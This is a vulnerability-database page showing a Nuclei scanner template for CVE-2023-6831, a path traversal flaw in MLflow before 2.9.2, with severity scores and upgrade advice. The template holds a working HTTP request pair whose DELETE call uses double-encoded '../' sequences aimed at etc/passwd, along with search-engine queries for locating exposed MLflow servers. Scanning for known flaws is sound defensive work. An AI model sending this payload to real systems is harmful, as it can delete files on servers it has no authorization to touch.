Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-6831
HistoryFeb 05, 2024 - 3:38 a.m.

mlflow - Path Traversal

2024-02-0503:38:11
ProjectDiscovery
github.com
18
cve
cve2023
mlflow
path traversal
lfprojects
github
vulnerability

8.1 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

0.002 Low

EPSS

Percentile

59.1%

Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.
id: CVE-2023-6831

info:
  name: mlflow - Path Traversal
  author: byObin
  severity: high
  description: |
    Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.
  remediation: |
    Upgrade Mlflow to version 2.9.2 or later to mitigate the vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6831
    - https://github.com/mlflow/mlflow/commit/1da75dfcecd4d169e34809ade55748384e8af6c1
    - https://huntr.com/bounties/0acdd745-0167-4912-9d5c-02035fe5b314
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2023-6831
    cwe-id: CWE-22,CWE-29
    epss-score: 0.00207
    epss-percentile: 0.58698
    cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: lfprojects
    product: mlflow
    shodan-query: "http.title:\"mlflow\""
    fofa-query:
      - title="mlflow"
      - app="mlflow"
    google-query: intitle:"mlflow"
  tags: cve,cve2023,mlflow,pathtraversal,lfprojects,intrusive

http:
  - raw:
      - |
        PUT /api/2.0/mlflow-artifacts/artifacts/{{randstr}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        {{randstr}}

      - |
        DELETE /api/2.0/mlflow-artifacts/artifacts/%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252Fetc%252fpasswd HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: word
        part: header_2
        words:
          - "Content-Type: application/json"
          - "Server: gunicorn"
        condition: and

      - type: word
        part: body_2
        words:
          - "{}"

      - type: status
        status:
          - 500
# digest: 490a00463044022021fbebaa88ab1755114b7966a9f7a1cea58912f8b304515cab004679a5691d3e02200b73631111984f9659dd5aafeb2ceabf1b746bbd81eae1bda187053ddfc48da1:922c64590222798bb761d5b6d8e72950

8.1 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

0.002 Low

EPSS

Percentile

59.1%

Related for NUCLEI:CVE-2023-6831